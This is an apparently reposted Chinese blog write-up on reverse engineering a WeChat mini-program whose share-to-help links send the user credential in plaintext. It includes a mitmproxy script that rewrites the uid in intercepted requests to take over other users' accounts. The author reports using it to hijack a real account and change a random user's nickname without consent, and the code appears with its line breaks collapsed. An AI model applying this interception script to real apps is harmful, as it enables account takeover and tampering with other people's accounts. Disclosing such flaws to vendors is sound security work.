小程序逆向 某小程序通过助力链接盗号

admin
admin
admin
131465
文章
107
评论
2024年11月26日10:18:06评论6 views字数 603阅读2分0秒阅读模式
又是上一个小程序,开发出来挨打(不是)
是盗小程序的账号,不是微信号~
助力玩法如下
小程序逆向 某小程序通过助力链接盗号
转发到群里,别人点进去就算助力成功
小程序逆向 某小程序通过助力链接盗号
浅浅抓个包,发现助力的jid(用户凭证)明文传输
小程序逆向 某小程序通过助力链接盗号
于是用mitmproxy写了个脚本
from mitmproxy import httpfrom multy_account.account import uid_listdefrequest(flow: http.HTTPFlow) -> None:# pretty_host takes the "Host" header of the request into account,    # which is useful in transparent mode where we usually only have the IP    # otherwise.    if flow.request.pretty_host == "xxx.xxxxxx.com":        print(flow.request.url)        # print(flow.request.urlencoded_form['uid'])        if flow.request.urlencoded_form['uid']:            flow.request.urlencoded_form['uid'] = uid_list[2]
再次刷新小程序,成功获取到别人的账号
随机修改一位幸运观众的昵称
小程序逆向 某小程序通过助力链接盗号

本文内容来自网络,如有侵权请联系删除

小程序逆向 某小程序通过助力链接盗号

原文始发于微信公众号(逆向有你):小程序逆向 -- 某小程序通过助力链接盗号

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月26日10:18:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   小程序逆向 某小程序通过助力链接盗号https://cn-sec.com/archives/3437382.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息